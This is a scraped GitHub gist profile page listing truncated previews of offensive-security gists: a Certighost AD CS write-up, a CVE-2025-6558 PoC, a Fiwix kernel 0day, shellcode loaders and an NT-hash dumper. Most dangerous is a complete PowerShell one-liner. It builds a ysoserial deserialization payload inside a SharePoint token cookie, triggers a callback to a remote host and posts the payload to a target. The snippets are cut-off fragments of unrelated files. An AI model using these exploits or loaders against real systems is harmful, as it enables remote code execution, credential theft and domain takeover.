Skip to content

Instantly share code, notes, and snippets.

View ASkyeye's full-sized avatar
:shipit:
Super Hacker Bot - Verified by Github

ASkyeye

:shipit:
Super Hacker Bot - Verified by Github
View GitHub Profile

Certighost (CVE-2026-54121)

Authors: @h0j3n, @aniqfakhrul
Date: July 24, 2026


Certighost is an Active Directory Certificate Services (AD CS) vulnerability that allowed a low-privileged domain user to impersonate a Domain Controller and achieve domain compromise in the tested AD CS configuration. The issue was addressed in the July 2026 security updates.

The vulnerable path is an AD CS enrollment fallback known as a chase during directory-object resolution. By supplying request attributes such as cdc, an attacker could cause the Certification Authority (CA) to ask an attacker-controlled host for identity data belonging to a Domain Controller. The CA then used that data while issuing a certificate.

$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -
@ASkyeye
ASkyeye / windows-11-ioctls.cpp
Created February 24, 2026 03:39 — forked from daaximus/windows-11-ioctls.cpp
Windows 11 26100 All IOCTL List
; ioctl codes extracted
; daax (2026) -- win 11 26100
;
#pragma once
#include <stdint.h>
typedef struct _ioctl_t {
const char* ioctl_name;
/*
* blasty-vs-fiwix.c -- by blasty <peter@haxx.in>
*
* 0day exploit for Fiwix OS i386 (tested on Fiwix 1.7.0)
*
* THEY HAVE PLAYED US FOR ABSOLUTE FOOLS!
* DO NOT TRUST SMALL UNIX-LIKE KERNELS!
*
* Fiwix OS has multiple TTY ioctl vulnerabilities that allow
* arbitrary kernel memory read and write.
@ASkyeye
ASkyeye / CVE-2025-6558.html
Created September 16, 2025 19:52 — forked from d4rkc0nd0r/CVE-2025-6558.html
CVE-2025-6558 PoC
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CVE-2025-6558 PoC</title>
</head>
<body>
<canvas id="canvas" width="480" height="640"></canvas>
<script>
function tf_bug() {
import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary
@ASkyeye
ASkyeye / JasonToddIsTheBestRobin.c
Created August 23, 2025 12:03 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@ASkyeye
ASkyeye / LowNtReadFile.c
Created August 13, 2025 00:34 — forked from whokilleddb/LowNtReadFile.c
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
@ASkyeye
ASkyeye / enclave.c
Created August 3, 2025 23:49 — forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@ASkyeye
ASkyeye / badsuccessordumper.py
Created August 1, 2025 13:19 — forked from ThePirateWhoSmellsOfSunflowers/badsuccessordumper.py
This script retrieves NT hashes of all domain users and computers using a dMSA
import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary